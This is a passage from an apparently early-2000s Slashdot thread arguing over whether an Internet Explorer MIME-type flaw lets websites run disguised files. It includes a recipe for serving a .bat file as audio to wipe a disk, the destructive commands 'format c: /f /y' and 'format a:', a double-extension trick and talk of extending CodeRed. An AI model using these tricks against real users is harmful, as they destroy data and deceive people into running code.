    Now tell the webserver that the MIME type for BAT files is audio/x-wav and add a link to imamoron.bat (you probably need to restart your webserver). Hit it with IE, and kiss your hard disk goodbye.

    --
    Got time? Spend some of it coding or testing
    1. Re:Try this... by laserjet · · Score: 2

      I think that should be format c: /f /y

      --
      Moon Macrosystems. Sun's biggest competitor.
  177. FUD goes both ways by Anonymous Coward · · Score: 0
    Microsoft can spread FUD, and tada.. so can Slashdot.

    The poster seems to thinki he knows exactly what the hole is, but obviously doesn't, since what he described does not cause problems. I tried the follwoing two scenarios:

    • Download test.exe, with Content-type set to text/html - IE prompts you to Save/Open/Cancel the transfer. Normal behavior.
    • Download test.txt, with Content-type application/octet-stream - IE prompts you to Save/Open/Cancel the transfer. Clicking open, attempts to open it in Notepad. Again Normal behavior.


    IE ignoring Mime-type has ZILCH to do with OS integration. Accessing local files within a browser has been allowed on all platforms, for as long as I've touch web browsers. It used to require the file:// URL, but those are still local files, with MIME types based on extension.

    What the poster also fails to realize also, is that Windows assigns MIME-types in the same way IE assigns MIME-types. There is no large architectural flaw.

    As for the assertion that IE completely ignores MIME-types defined in a Content-type, this is not true (at least not always). If it was IE wouldn't display most CGI programs correctly, which often have either no extension, or in the case of IIS servers, the EXE extension.
    1. Re:FUD goes both ways by ROBOKATZ · · Score: 2, Interesting
      Your first point is not normal behavior. The exe file should have displayed (garbage) in your browser window.

      Secondly, the text/html content-type is not executed, it is rendered in the browser. You would need to set the content-type to something automatically run by an external viewer, like video/mpeg.

      Then the browser will say, "Ok, this is a video file, better ShellExecute() it", then the Shell API will look at the extension, .EXE, and run the file as a standalone executable.

      Anyways, I haven't tried it yet for myself, but that's the impression I'm under as to how it would work. It might be trickier than this, or only work with specific set ups and content-types.

    2. Re:FUD goes both ways by ROBOKATZ · · Score: 2, Informative
      Ok, I have tried this myself, specifying exe as video/mpeg in Apache mime-types, and my results agree with yours.

      In addition, this is how IE determines MIME types. It does not completely ignore the supplied Content-Type, but it might as well be. Primarily, it is exmanining the first 256 bytes of the file to determine if it is a known type. So unless you can disguise an executable with an mpeg header or something, you're not going to be able to get native code to automatically run without a prompt.

  178. Re:Try this at home (or "not just a threat, also a by btellier · · Score: 1

    Obviously this is less of a security bug and more of an obfuscation of the file type. As always, people are just unable to resist the temptation to open something "in order to have your advice".

  179. User intervention? by roystgnr · · Score: 2

    By your logic, just clicking on a hyperlink in the first place might as well be "user intervention".

    The fact is, there are some things that users are supposed to be able to do without being afraid of their system being remotely compromised and trashed! And opening a .txt file (or most types of files) of indeterminate origin, just like opening a hyperlink, is among them.

  180. I hope this jacket is flame-proof ... by shrikel · · Score: 1

    I know this will sound like I'm jumping to the wrong side of the fence, but there's one thing to say that is (marginally) in Microsoft's behalf -- while they originally "didn't consider it a problem," they *have* since reversed their position. So maybe they've been screwing over the whole world for the past fifteen years -- at least they have the guts to admit it and "start working" on a patch. ;)

    --
    Any sufficiently simple magic can be passed off as mere advanced technology.
  181. Here's the fix. by corky6921 · · Score: 5, Interesting

    "So what it comes down to, is I also have to mangle the output name be making it .txt_ so that IE will not try and read it, along with passing it a bad content type, otherwise if it's application/octet-stream or some such, it will STILL RENDER IT IN THE DAMN WINDOW..."

    I had this same problem. Basically, you must make sure to pass the filename as part of the content header, but not attached to the end of the script name. This way, IE will always pop up a window asking you to save. It will tell you that it is saving your script name, but in reality, it will save the page you want it to.

    First, write the page from your database to your local server as a file. Then do the following (my script is written in PHP; translate as needed.)

    I wrote my database contents to a variable called $content, then executed the following code:

    # put content into file called download/$page_num.html
    $fp = fopen ("download/${page_num}.html", "w");
    fwrite($fp, $content);
    fclose($fp);

    if ($action == "download") {

    # set up file download to client
    header("Content-Type: text/unknown\n");
    header("Content-Disposition: attachment; filename=\"${page_num}.html\"");
    header("Content-Transfer-Encoding: ascii");
    $fn=fopen("download/${page_num}.html", "r");
    fpassthru($fn);
    unlink("download/${page_num}.html");
    exit;

    };

    Note the key difference between my script and yours is the fact that I'm not passing anything but a content header to IE. Don't use your_script.php?filename=xxx... that doesn't work. Just write the filename as a variable and put that variable in the content disposition header. Also note that the Content Type can't be text/html, or, really, anything that IE will recognize.

    This works in both Netscape and IE. Note that if you're working cross-platform using text files, you'll have to convert line breaks. I use the following code:

    # get os for carriage returns :P
    if(strstr(getenv('HTTP_USER_AGENT'), 'Win')) {
    $content = eregi_replace("\r","",$content);
    };

    Again, that's PHP -- translate if necessary.

    Here's the final trick I'll pull out of my bag: if you set a Content Type to application/vnd-msexcel or somesuch (I could be off on that), and send the client a tab-delimited text file, it will open in Excel. Same goes for plain text and Word. It's a great trick to pull when you know your client is going to be using Windows and will say, "Hey, how did you get your script to make an Excel file? That's so cool!" (Always nice to have a little extra trick to impress your clients... ;)

    Hope this helps --
    Erica

  182. A proper "fix" by Bantha+Fodder · · Score: 1
    In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.
    The first time I read that, I thought he was advocating disintegrating the browser, which seems like a much better solution.
  183. Windows unsafe cause of IE ??? OH PLEASE !!! by Anonymous Coward · · Score: 0

    That's not what the nice salesman told me last week when I let myself be talked into buying 10 Copies of Windows 95 for my whole family, with 10 Licences of IE ...
    So, don't ya be saying that nice salesman lied to me, Ain't nice bad talking behind a man's back ...

  184. Worst article ever by Tazzy531 · · Score: 1

    This is by far the worst article ever read on slashdot. Where is your proof? where is the evidence? Has MS specifically said they will NOT fix this bug? Is this even a bug? Makes you wonder...

    --


    _______________________________
    "I'm not Conceited...I'm just a realist..."
  185. Re:Now that this particular cat is out of the bag. by zbuffered · · Score: 1

    Agreed. Analogy: If Honda sold all Honda Accords with the same key, and didn't tell anybody, and mine got stolen, it'd be their fault. Even if recalling them would cost Honda lots of money. Because just as I could not be expected to watch my car at all times to make sure it is not stolen, I cannot be reasonably expected not to surf the 'net using the pre-installed browser. Especially if I didn't know I wasn't supposed to.

    --
    Synergy is your friend
  186. You feel lucky today punk. by RodeoBoy · · Score: 1

    Are you confident about that.

    Have you ever hear a little thing call nimda? Are your virus definitions current? Does it scan your Internet Temporary Files automatically? Do you like to live dangerously? Why not put these little numbers in your IE browser 24.219.119.125. THIS SITE IS INFECTED WITH NIMDA, SO IF YOU USE IE AND KNOW WHAT IS GOOD FOR YOU DO NOT GO HERE

    If your a bit curious what can happen, when your virus definition is current then go hear. On the Brink. You may notice that there is no pic of the download dialog box popping up, because it doesn't. This is an eml file and it is safe, right ;^P

    For a laugh check out another post on this thread by me about a friend of mine who did not have current definitions for his AV.

    It's fourty below and I don't give a ....

  187. Simple but effective security steps by Anonymous Coward · · Score: 0
    Visit the Mozilla site, download and install the latest version (with talkback please). Run it, and if it asks to be made handler for HTML etc, say yes. Then remove every trace of IE from your hard disk.

    Safe at last! Whew!

    Not really, you still have to remove the Redmond Virus from your hard disk. For this, visit another site's list of download mirrors and be prepare to wait a little longer. Yes, Mozilla is included with your replacement OS.

    I guess IE for Mac is already invulnerable.

  188. Thanks for the freedom-subtracted software ad--not by Anonymous Coward · · Score: 0

    Is Opera free software (that's free as in liberty, not free as in beer) yet? No? Then no thanks. I'd rather choose software that poses the least potential for biting me in the ass later on. That's free software.

  189. Wrong, it't open (i.e. vulnerable) no matter what. by AftanGustur · · Score: 2, Insightful

    Your computer is open if you stumble across a specially constructed site. If you browse /. the news, stock quotes etc. then you're prett much safe.

    Wrong, if you have a gaping security hole on your computer, then you're vulnberable (open) even if no-one exploits the hole.

    The story, as posted on /. has it right.

    --
    echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
  190. Re:other browsers - More than stats show by Anonymous Coward · · Score: 0

    Yes - it's the default setting for Opera. You have to specifically change it, and that just causes some pages to stop working.

  191. Re:Now that this particular cat is out of the bag. by Kidbro · · Score: 2

    What kind of steps can people use to protect themselves now

    This step and this, for instance :)

  192. Mozilla isn't much better by N8F8 · · Score: 1, Offtopic

    I have run into the same problem using Mozilla and K-Meleon. I love Mozilla for blocking popups, but prompting me to download a file that should be displayed is annoying. Try downloading a hotmail attachment somtime.

    But its not as annoying as the moment of panic I get in MSIE when the computer appears to lock up and then I realize its just another popup or popunder.

    Of course if MS would have left "browse in a new process" as an option without doing a registry hack....Grrrrr. Some day I'll get a job in a Non-MS workplace....

    --
    "God fights on the side with the best artillery." - Napoleon, Marshal of France - speaking truth to power
  193. Netscape dropped the ball by autopr0n · · Score: 2

    Please, Microsoft may have used some competitive pressure, by making IE easier to come by then anything else. But I have trouble blaming Netscape's demise on anyone but Netscape. 4.7 was a complete piece of shit, and Netscape put out some of the buggiest, crash prone, shit ever. That's why people switched to IE, that's why I switched to IE. Because Netscape, comparatively, was a piece of crap.

    --
    autopr0n is like, down and stuff.
    1. Re:Netscape dropped the ball by bribecka · · Score: 2

      Because Netscape, comparatively, was a piece of crap.

      I used to use only Netscape a few years back when I ran NT4 at a place I used to work at. Now, IE 4 was out but I didn't like it. The problem was that Netscape refused to fix a problem where Java applets would not load through a firewall. After waiting for months and months, and realizing that IE4 did support that...I switched. Never looked back to Netscape.

      Of course, this was when Java applets were relevant technology.

      --

      Where are we going and why am I in this handbasket?

    2. Re:Netscape dropped the ball by drsquare · · Score: 0

      Oh come on. People don't voluntarily chose IE. They use it because it comes with the computer. The same reason people Outlook Express and Windows.

      Do you think the typical ignorant user actually decides what OS/browser/mailer he uses?

    3. Re:Netscape dropped the ball by deaddrunk · · Score: 1

      Oh please. As if Microsoft removing their major source of revenue would have no effect on their business.

      --
      Does a Christian soccer team even need a goalkeeper?
  194. but, it doesn't execute by Anonymous Coward · · Score: 0

    lynx, links, etc. browsers rely on the extension to decide which program to fork to view/run/listen to the file. Even if the browser is somehow fooled into thinking that an executable is a .jpg, it will call an *image viewer*, not execute the program. The worst thing to happen will be that the file will be useless.

  195. witch, of course, I cannot stand by autopr0n · · Score: 2

    MDI annoys the hell out of me, to be honest.

    --
    autopr0n is like, down and stuff.
    1. Re:witch, of course, I cannot stand by jx100 · · Score: 1

      Read the post above yours then.

  196. Mod this down by Anonymous Coward · · Score: 0
    If you actually cared to follow your own links, you'd have noticed that the issues described were not at all similar (server side vs client side exploits), and neither was the reaction: in one case, RedHat was actually accused of releasing fixes too fast rather than too slow, as would be the case for Microsoft.

    So, mandolin, please shut the fuck up, and take your drivel back to Redmond. We don't need you here.

  197. 3 weeks? That's not *that* bad by benb · · Score: 1

    > Pynnonen reported the IE vulnerability to
    > Microsoft on Nov. 19

    That's about 3 weeks ago. Microsoft has to reproduce the bug, fix it, test the fix, test the fix more, publish the fix. 3 weeks are not *that* much.

    I bet that many open-source software has security holes open longer than that.

    1. Re:3 weeks? That's not *that* bad by mollusk · · Score: 1

      True. There are numerous open source software projects with non-existent or poor history for handling security holes. Months, or even years, may pass before someone gets around to fixing a hole (if ever).The difference here is scale.

      If Joe Developer loses interest in his custom coded, whiz bang email client, or doesn't have the time to fix it, only the current users ( downloaded 347 times from freshmeat.net ), are at risk. You see, Joe has limited resources, and in a sense, a limited responsibilty for his software.

      Contrast this with Microsoft: essentially limitless corporate resources, an immense amount of developer brain trust ( well, some may argue ), and over 90 % of desktop users.

      In the 3 weeks in which Microsoft has been provided with this information, Joe may have been able to put in at most, say 8 hours of time on his hole; How many man-hours of developer time do you think Microsoft had available in that period? How much was wasted at those, oh so exciting, "team meetings?"

      Combine that with Microsoft's massive market share. What are the chances of any random open source project being used at YOUR bank, YOUR local police station, YOUR wastewater treatment facility? If not yours, then someone else's. WIth greater market share comes greater responsibility. The more people you have depending on your product, the more important it becomes that you dont screw things up somehow, and when you do, admit it, fix it, and move on.

      This isn't a slam on Microsoft. I would hold the same standards to any entity that held even a fraction of importance ( like it or not ) that Microsoft enjoys. The major open source projects like Linux, and the major players, like Debian or Redhat, get the same criticism over security holes. Yet, they hold a much better track record in owning up to their mistakes (Which is what a patch is).

      So, if 100 million users used Joe Developer's project, AND Joe had ~$36 billion in the bank, yeah, I'd be just as pissed at him too.

      --
      The Revolution. Now available as a convienent six tape series from PBS.
    2. Re:3 weeks? That's not *that* bad by benb · · Score: 1

      I see what you mean and agree.

      But be aware that with more users, things get also more difficult. You have to test much more to not ship crap or something that doesn't work on some uncommon configurations.

  198. CodeRed + this = nasty by BlueHands · · Score: 1, Offtopic

    The next gen of virus should spread by exploiting all of MS lovely holes. Modifing CodeRed to use this exploit would be very tasty. You could have 2 excellent attack methods: attacking by scanning for open IIS servers,once found you could spread to anyone who downloads from the infected server. one downloaded you could either email yourself out or start scanning from the download machine.

    There are so many DIFFERNT holes in all of the connected products the virus's life cycle could be spread over many different stages. Let the fun begin! Thank you MS!

    --
    I mod everyone down who says "I'll get modded down for this." I hate to disappoint.
  199. middle button by jaavaaguru · · Score: 1
    I know this is getting a bit OT, but...
    I thought it was a kind of UI standard that the middle button on a mouse opens a new window when you use it in a web browser. Konqueror, Mozilla and Netscape all do this. If your pointer is over a hyperlink at the time, then it will open the linked document in a new window. I was under the impression that Opera did this too. At leas on my system, when I want to scroll, I use the scroll wheel on my mouse (which can also click and doubles as the "middle" button).

    I'm using a MS Intellimouse Explorer and RedHat 7.2 if that's of any relevance.

    You mention that your browser scrolls way too fast. I don't know about browsing in the Windows world, but I've realised there's a lack of ability to control how fast the wheel causes pages to scroll and different apps seem to choose by themselves (ranging from scrolling a couple of lines at a time to scrolling a page at a time). As well as choosing a standard for what the middle button does (i was sure there alrady was one) I think the community (develpers I mean) need to agree on some way of deciding what the wheel does (on mice that have one).

    1. Re:middle button by wheany · · Score: 1
      You mention that your browser scrolls way too fast. I don't know about browsing in the Windows world, but I've realised there's a lack of ability to control how fast the wheel causes pages to scroll and different apps seem to choose by themselves (ranging from scrolling a couple of lines at a time to scrolling a page at a time).

      The middle-button scrolling works like this: You click the middle button, and move your mouse up or down (you don't have to keep pressing the middle button, just click it) The more you move the mouse, the faster the page scrolls. With Opera, this works as it "should", but with IE, Word, Excel and other MS products, at first the page scrolls really slow, but when you move the mouse over a certain distance from the place where you clicked the middle-button, the scrollrate increases, well, a lot. And after you move the mouse a little bit further, the scrolling becomes way too fast to be practical for anything. With Opera the scrollrate increases gradually, and it's pretty easy to find a distance where the page scrolls just fast enough to leave the mouse alone and read Slashdot or long documents.

      But what's more important are the mouse gestures, for example: "Press and hold right mouse button, drag mouse to the left, release right mouse button" = back. Personally I don't use mouse gestures for anything but closing windows (down, then right) and refreshing a page (up, then down). For back and forward I use "hold right button, click left button, release right button" and "hold left button, click right button, release left button", respectively. And since "back" means display the previous page immidiately, it does make browsing "swooshy."

  200. this works how? by pangloss · · Score: 3, Interesting

    upon first reading michael's post, i thought this wouldn't work, because ie has that annoying behavior of examining the first bytes of file to determine its mime type, sort of like apache's mime-magic module. and then ie in 5.5sp1 had to go and break the content-dispostion header, but i digress.

    anyway, i tried to recreate this bug, with no luck. maybe someone can explain what i'm doing wrong, assuming this is a valid hole in i.e.:

    server: apache 2.0.28 beta for win32
    client: ie 5.5 sp2 (not sure if it's stock sp2 or has a hotfix on top of sp2. there's some Qxxxxxx following in the "about" box)

    in httpd.conf, created the following:
    <Directory "c:/foo/bar">
    #AddType audio/x-wav .bat
    #AddType audio/x-wav .txt
    AddType application/octet-stream .txt
    AddType application/octet-stream .bat
    </Directory>

    created two files:
    a.bat:
    @echo off
    format a:
    b.txt:
    this is a just an .exe renamed to b.txt

    ie renders the .bat file as text in the browser.
    in the case of the .txt, ie prompts to open or save, defaulting to save. selecting open opens the binary file in notepad.

    changing the mime-type to audio-x-wav just renders the files as text in the browser (no prompting in the case of the txt/exe).

    so what's the big deal?

    1. Re:this works how? by Peyna · · Score: 1

      the only way I can think of to circumvent this would be something like b.txt.exe, which I believe will appear to the person as a text file, but will execute when you "open" it. (Works on a local machine this way, I assume it would be the same coming from a website, since that's how it decides what to do with the file coming in.)

      --
      What?
    2. Re:this works how? by novikov · · Score: 0

      If I am understaning the article correctly the problem comes when you click the open option and run the file remotely, it doesn't give you the standard security blurb about files containing viruses and stuff.

      Just what I understand the issue to be...

  201. God please make them fix this! by Anonymous Coward · · Score: 0

    I really don't care about the security issue (well I do but that's not the point).
    The whole download file process in IE is screwed up.
    Say you want to allow users to download a generated file that is to be saved as "report.zip". The good way to do it is to have a cgi or asp or whatever generate the file on the fly and send them to the user.
    Now HTTP has default headers for this exactly this. Guess which browser doesn't do what you tell it and has a different behaviour for each and every version.

  202. Re:Try this at home (or "not just a threat, also a by Darby · · Score: 1

    I develop software for a living...
    When I serve this URL up to IE 6 under Windows 2000 (maybe other versions; that was the only Windows IE I tried)


    Parse error...
    These 2 lines are soooooo incompatible as to be ridiculous.
    You *only* test on beta software (IE6) ?!?
    And you do this for a living?!?

  203. What the fuck? What has slashdot come to? by autopr0n · · Score: 2

    This article is complete crap. I tested it, myself, and it simply isn't true.

    A quick edit of my mime.types file in apache, and .exe files are now sent as text/plain. When I type in the URL http://autopr0n.com/cliplay.exe. Internet Explorer does indeed handle it the same way it would handle executable content. It asks if i would like to download or execute it Hardly much of a fucking security issue if you ask me, especially considering the fact that it would behave in the exact same manner if the mime type was application/octet-stream or whatever the default value was.

    In other words, the meme type has no effect on how IE handles executable content. But if this were a problem, it would mean that IE automatically ran all executable content it received, including stuff with the proper mime header. You would know this two if you stopped to think about it for half a second.

    Oh, and mozilla does the exact same thing (well, it doesn't give you the option to execute from the cache like IE does). At least in the somewhat older version I have.

    You guys couldn't take five fucking minutes to test this before posting this crap story?

    Oh wait, it was from michael... nevermind. Anyone else remember the united devices fiasco a while back where michael attacked some anti-cancer distributed software because it was being funded by 'corporations' (Intel) who would of course patent everything and make money off everyone's spare cycles (despite the fact that it was clearly stated on the site that it wouldn't be). Couldn't be bothered to check sources or verify anything before posting a story to millions. And it's the same here. Way to fucking go Mr. 'journalist'

    --
    autopr0n is like, down and stuff.
  204. Opera 5.12 is vulnerable too! by ymgve · · Score: 3, Interesting

    For all the fanboys that scream out that Opera is better than IE (and it is, I love it too) - in this case it is vulnerable too, as this link proves. The file save dialogue will show the text.txt filename, but if you select to open it directly, it will run.

    Opera 6.0 is not vulnerable - but take note - even though it is much better and has less exploits than IE, it's still not completely free of them. (On the other hand, the only secure applications are those on an unpowered computer, or a program of 'Hello World' complexity)

    1. Re:Opera 5.12 is vulnerable too! by Anonymous Coward · · Score: 0
      "For all the fanboys that scream out that Opera is better than IE (and it is, I love it too) - in this case it is vulnerable too, as this link proves."

      Only if you set Opera to look at the MIME type for opening files. By default, it is set to look at the file extension, making it not vulnerable, unless the user changes this option from the default setting (which is stupid, since it will break Opera on a lot of sites!).

      "Opera 6.0 is not vulnerable - but take note - even though it is much better and has less exploits than IE, it's still not completely free of them."

      Oh yeah? Which ones have you found, then?

    2. Re:Opera 5.12 is vulnerable too! by ymgve · · Score: 1

      For example the cross-site scripting bug that could make websites grab your password cookies? (Don't remember any URLs atm)

    3. Re:Opera 5.12 is vulnerable too! by jij · · Score: 1

      "For all the fanboys that scream out that Opera is better than IE (and it is, I love it too) - in this case it is vulnerable too, as this link [geilerserver.de] proves. The file save dialogue will show the text.txt filename, but if you select to open it directly, it will run. "

      Umm, no, my copy of Opera 5.12 shows 'calc.exe' in the file save dialogue, not 'text.txt'. And in fact if one clicks on the link, the file is rendered as text, rather than executed.

  205. No by autopr0n · · Score: 2

    What happens if, you send an .exe file with an audio/x-wav mime type is that IE will handel it like any other .exe file it runs across. it'll give you the option to save or run it, as an EXE. in other words, the mime type is pretty much ignored.

    --
    autopr0n is like, down and stuff.
    1. Re:No by arodland · · Score: 2, Informative

      still no.

      you can send an executable file, and tell the browser that the filename is "readme.txt" and the content-type is, er, executable whatever.

      For the purposes of the security dialog, it's readme.txt, you get the Open/Save box, not the Run/Save security warning box, and the name shows as readme.txt. But if you select Open, when it downloads, *poof* it runs the exe.

      Basically.

    2. Re:No by autopr0n · · Score: 2

      Dude, I tried that. The exe just opens up in notepad.

      --
      autopr0n is like, down and stuff.
    3. Re:No by Anonymous Coward · · Score: 0

      Yes, sure, if you're not playing any trics with the MIME type haders, like the bug report is telling you to. The bug will not "work" (like you noticed) with an ordinary correct mime information, as is what you get from a properly configured www-server that does not look inside the file for it's type.

  206. Be careful with that. by autopr0n · · Score: 3, Funny

    If you try that on a windows machine, make sure you don't have .bat files set as server side exicutables.

    you'd be just as likely to kill your server's hard drive while the user got a nice web page that said "please wait, unpacking..."

    --
    autopr0n is like, down and stuff.
  207. Re:su, then by Morlenden · · Score: 1
    Another unix-y thing is to not run untrusted programs under accounts that have any access to important files.

    On Windows, create a separate user account for the browser with no access to any important files, and use "runas" to start the browser.

    For IE:

    %windir%\System32\runas.exe /user:ie /profile "c:\program files\internet explorer\iexplore.exe"

    For Mozilla:

    C:\WINNT\system32\runas.exe /user:mozilla /profile C:\Mozilla\bin\mozilla.exe

    --
    "Slapping people is fun." - Starla Grady
  208. -1 Overrated by xX_sticky_Xx · · Score: 1

    Nope. Tried it on IE6.0 and IE informs me that the file is of an unknown format or corrupted.

    --

    ---

    I didn't want to leave this space blank.
  209. except, of course, that its entirely not true. by autopr0n · · Score: 2

    URL: http://autopr0n.com/cliplay.exe

    Mime type: audio/x-wav

    Action: Opens up media player and says "cannot play back, format not supported"

    In other words, you're completely full of shit. And so is the person who posted this bogus artical in the first place.

    --
    autopr0n is like, down and stuff.
    1. Re:except, of course, that its entirely not true. by zeno_2 · · Score: 1

      When I tried this (WinME, IE6) it asked me to open/save. I chose open (hey its a work computer, I could care less if it breaks). After a few seconds, sound recorder came up and said that it was not a valid wave file.

      Now, I think this will still work, maybe audio would have been a bad thing to set it as. Try that same thing but set the mime type as html/txt or whatever it was.

  210. Re:Umm. Not really. by underpaidISPtech · · Score: 2

    >Actually, Slashdot has way more Windows apologizers than it used to. And this is a bad thing.

    Apologists? Get stuffed. How about rational and clear-headed. Like being able to spot reverse FUD in action. Again, you are another /.er with an agenda to push. I've said it before, I'll say it again. I don't come here to fucking push a one-sided agenda, and I think that the so-called apologists are just geeks looking for some JOURNALISTIC INTEGRITY. If the low UIDs and zealots want to keep the blinders on and circle jerk all the way to non-MS heaven so be it. This board seems to be evolving away from that, thank god. There are some of us who recognise flaws and strengths with many different apps and OSes and are WILLING TO TELL THE FUCKING TRUTH.

    Yes this "feature" is a security risk. Yes it is serious. And YES, the tone of Michael's comments border on tabloidism. And YES, I think it is appropriate that the patrons of this board be able to point that fact out and demand a little bit of non-partisan behaviour from the editors.

  211. Re:Thanks for the freedom-subtracted software ad-- by KILNA · · Score: 1

    Wow. Never expected this reaction on slashdot. :)

    --
    Error: PANTS NOT FOUND. Press <F1> to continue.
  212. Extremely misleading Slashdot article. by ColdGrits · · Score: 2, Insightful

    "The patch for Internet Explorer (IE) is currently in testing and could be released soon, according to Jouko Pynnonen, a security researcher with Finland's Oy Online Solutions. Pynnonen reported the IE vulnerability to Microsoft on Nov. 19 and recently tested the software fix at the company's request. "

    Correct me if I am wrong, but that doesn't sound like M$ refusing to fix the bug or not fixing it to me...

    --
    People should not be afraid of their governments - Governments should be afraid of their people.
  213. Oops sorry by jquirke · · Score: 1

    Oops sorry without the link this does look like a troll :-(

    Obviously some of you didnt read that /. story

  214. Re:Now that this particular cat is out of the bag. by Cato+the+Elder · · Score: 2

    "What kind of steps can people use to protect themselves now"

    Never ever choose "open file from its current location" no matter what you think the name is, unless you are willing to give trust the site with any data on your system.

    Of course, since no data has been released, I'm not sure this fixes all the problems, but from the description in the article it would. (Somewhere above someone says that IE executes certain MIME types, namely audio, automatically. However, AFAIK, in that case it would attempt to use the correct plugin, and this vunerability would not apply).

    I don't think this will do major damage. There seems to be a real easy workaround. I think michael is blowing things a bit out of proportion in his article. On the other hand, I do agree that this is a perfect example of how Microsoft's refusal to divulge information has nothing to do with protecting customers. Sure there is no "patch" for the vunerability yet. But NONE IS NEEDED! In no case is any legitimate usage made immpossible (check me on this--Microsoft may have implemented some stupid "copy protection" where you can only open a file but not save it). It is only made less convienent. Users can be protected the instant they see the alert, Black Hats will take time to set up an exploit even if tools are made easily available.

  215. Not true. by autopr0n · · Score: 3, Informative

    URL: http://autopr0n.com/random.txt.
    Mime type: application/octet-stream
    Actual type: text file
    Action: shows up in IE as a regular text file.

    Now, when you take a real .exe file, rename it to .txt, and then send it as application/octet-stream IE will prompt to download/open, and if you click open it will open it in notepad. For example
    URL: http://autopr0n.com/random.txt.
    Mime type: application/octet-stream
    Actual type: win32 executable (shows you how long your computer has been running, actually)

    --
    autopr0n is like, down and stuff.
    1. Re:Not true. by Pig+Hogger · · Score: 2
      Now, when you take a real .exe file, rename it to .txt, and then send it as application/octet-stream IE will prompt to download/open, and if you click open it will open it in notepad.
      It doesn't work.

      Could it be because I'm using opera????

    2. Re:Not true. by Yankovic · · Score: 1

      IE 6 behaves correctly by default as well (opens it in notepad).

  216. Re: MOD PARENT UP !!! by kigrwik · · Score: 1

    The grand parent post is incorrect, and the one I'm replying to is correct.
    Mod this one up at least to the same rating as "Intergating Web Browser and File Browser"

    --
    -- don't discount flying pigs until you have good air defense
  217. Re:Now that this particular cat is out of the bag. by ThePilgrim · · Score: 1

    All you need to do is find a country where the EULA cant take away the right of negligence

    --
    Wouldn't it be nice if schools got all the money they wanted and the army had to hold jumble sales for guns
  218. Ack, second URL correction by autopr0n · · Score: 2


    Sorry, the second URL should be http://autopr0n.com/uptime.txt

    --
    autopr0n is like, down and stuff.
    1. Re:Ack, second URL correction by Anonymous Coward · · Score: 0

      running XP Pro, IE6, when i click Open on the uptime.txt file, Notepad opens with some garbage...

      So?

  219. EFF? by autopr0n · · Score: 2

    I don't really think the EEF is going to go around lobbying for more restrictions on programmers.

    --
    autopr0n is like, down and stuff.
  220. Re:What the fuck? What has slashdot come to? by Wolfger · · Score: 2, Informative

    First of all: Test what? Details of the bug have not been released. So only your own arrogance validates your "test" of this bug.

    Second of all: The harm in this bug lies in IE asking the user if he wants to open a file of one type (i.e. Text, which is safe), and then proceeding to run maliscious code.

    Now this bug may not pose any threat to reasonably intelligent people, but I think we all know that the internet (and IE users even moreso) is not comprised solely of reasonably intelligent people. Hell, it might even get me, if I was an IE user. Why waste time/space downloading a txt file when I can open it in the browser? Trust issues? Who worries about whether or not to trust a txt file? Text is harmless, as long as it's treated as text.

  221. Can't you people spot sarcasm when you read it? by Anonymous Coward · · Score: 0

    Sheesh! Stop already.

  222. Not exactly by autopr0n · · Score: 2

    The problem here arises from the fact that Windows allows more than one '.' in a filename, but will only display one. Therefore, a malicious webmaster can name a file "foo.pdf.exe" and Windows Open/Save dialog will only display foo.pdf.

    Windows, by default, does not show the actual file extension. The 'actual' file extension is the last one. You can have as many '.'s in your file name, and the last one won't be shown if file extensions are turned off (not 'just one')

    If you turn file extensions on its not a problem.

    *sigh* is it to much to ask that people actually know what they're talking about?

    --
    autopr0n is like, down and stuff.
    1. Re:Not exactly by arkanes · · Score: 1

      BUT, all versions of windows to date ship with this option turned OFF, it's difficult to find for the casual user, who most often doesn't even know it exists.
      Trivial example: Joe sixpack goes to some porn site, say autopr0n.com. Joe is responsible and well informed for a member of the Sixpack family. He decides to buy a membership, but makes sure to read the privacy policy first. As is the case in a few sites I've seen, documents such as the privacy policy are PDF files. Joe clicks on the link, clicks "Open" (because he knows that PDF files can be shown in his browser, and does't feel like tracking down the downloaded file) and gets owned.

  223. Implied warrenties by autopr0n · · Score: 2

    That's true, but implied warranties make the assumption that the product is going to be as good as others on the market. And we all know, or at least have our stereotypes about the software market.

    So in the end, software has no implied warranties, because no one can reasonably expect that it won't be bug/security issue free.

    --
    autopr0n is like, down and stuff.
  224. Warning! by streetlawyer · · Score: 2

    Warning to consumers: Although it sounds like a good thing, "Standards-compliant", when used in the context of Mozilla, is a euphemism for "Fails to render a significant proportion of popular websites".

  225. Slander? by tacocat · · Score: 5, Insightful

    Let me say I will be one of the first to jump on the "I Hate Microsoft" wagons. But this article is just plain wrong, as in inaccurate.

    The first paragraph of the referenced story talks about how they are currently in testing for this security hole. Whereas, the poster is stating that Microsoft has no specific designs on when this will ever get fixed.

    Inaccurate, Fanatical Extremism like this is only going to hurt Open Source, Slashdot, and those associated with it. While Microsoft may be wrong in this case. It doesn't do us any good to exhibit poor sportsmanship. Leave that for the politicians

    1. Re:Slander? by Glanz · · Score: 1

      Why is it that when one simply states the fact that M$ has the historically poorest security record for its products than any other company in the same field of endeavor, that that is automatically "slander," "poor sportsmanship," and "fanatical extremism?" Microhead$ofties seem to consider valid criticism as being somehow "anti-AmericanoApplePieish" for some reason. If you wish to defend sloppy, top-heavy code, immoral business practices, and the fact that M$ customers are the purest of the pure sucker bait available on the market, then you are welcomed to do that. Just don't accuse those who valur truth above money. If I understood you correctly, then we'd better just shut up like M$ said, so that they may keep their flaws in the Redmond Dark, and users like you in their pocket(book).

      --
      Rien n'est plus beau que le creux du 0.
    2. Re:Slander? by simetra · · Score: 1

      I agree. The article is entirely different than the slant given by "michael".
      Perhaps people like this should spend more time making a better operating system, rather than taking any opportunity to bash MS. I'm not an MS fan either, but I tire of this continual MS bashing, especially when there's really no better alternative for a desktop OS on a PC.

      --

      "Would it kill you to put down the toilet seat?" -- Maya Angelou
    3. Re:Slander? by sheldon · · Score: 2

      "Why is it that when one simply states the fact that M$ has the historically poorest security record for its products than any other company in the same field of endeavor"

      It is untrue when you consider the fact that RedHat has released something like 72 security vulnerabilities for Linux in 2001 versus the 57 security bulletins that Microsoft has released for all of their products.

      And actually the RedHat number would be quite a bit higher, but instead of modifying bulletins on their site to say they have been superceded, they instead delete them. Based on their numbering system, one could easily assume they have released 160 bulletins this year about their product.

      So the simple fact is, RedHat has a much worse security record than Microsoft. By extenstion that implies Linux is far more insecure than Windows.

    4. Re:Slander? by Anonymous Coward · · Score: 0

